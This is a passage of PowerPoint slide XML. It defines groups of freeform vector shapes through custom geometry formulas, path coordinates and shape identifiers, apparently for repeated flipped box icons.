                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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33" name="Freeform 66">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0351F09F-DB5F-461F-BC5D-719AE3C0832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E6E6E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805" name="Group 67">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{294E9040-94C7-41F3-8D06-11A8F2FEE88F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 flipH="1">
                        <a:off x="1728" y="2218"/>
                        <a:ext cx="434" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1824" name="Freeform 68">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2316143-D483-4F87-9324-60291924361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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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25" name="Freeform 69">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92ED8AAD-04CA-4D39-99BE-C88D541DA2E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3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030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26" name="Freeform 70">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0332525-CE6F-473F-A88E-BD8F6DD5755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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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27" name="Freeform 71">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37AEAD31-75A5-4028-B4C9-FA42514CDD4F}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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28" name="Freeform 72">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1230759-0CBE-4EE2-B56E-2A0908B1BE2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E6E6E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806" name="Group 73">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801E11E2-69EF-4BEF-93EA-533AF955E05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 flipH="1">
                        <a:off x="1512" y="2276"/>
                        <a:ext cx="433" cy="342"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1819" name="Freeform 74">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B776BB6-0906-41ED-956F-888EEC720A9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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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20" name="Freeform 75">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB5963F-57F9-44D5-8563-4D0FBB8C4BA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3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030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21" name="Freeform 76">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0636BC5-A4F7-4327-B7B9-BB4E00A13BE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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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22" name="Freeform 77">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1140AE9-B631-4547-913A-7855130186E5}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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23" name="Freeform 78">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946D49AA-1F17-4E82-8CAE-F00CC9B6AB8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E6E6E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807" name="Group 79">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268BB55F-830C-4F7A-992A-826BF8C31FEF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 flipH="1">
                        <a:off x="1295" y="2335"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1814" name="Freeform 80">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD45D160-76ED-4183-A8E1-2B9289BE6D6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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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15" name="Freeform 81">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAE646C2-BF38-475A-8E90-FA46D3C089D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3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030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16" name="Freeform 82">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70840C4C-5B8E-4557-9394-5AAC3085EB1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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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17" name="Freeform 83">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5673401A-9745-4D72-97F8-FA1C6AF7427A}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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18" name="Freeform 84">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{846BD17B-C105-4DFE-A40A-D7D2308A294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E6E6E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808" name="Group 85">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4523018B-F546-4A8A-BD1B-4658CE589C9A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 flipH="1">
                        <a:off x="1079" y="2393"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1809" name="Freeform 86">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F5631C-E4E4-4F78-8E86-F5612B72948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331" cy="432"/>
                        </a:xfrm>
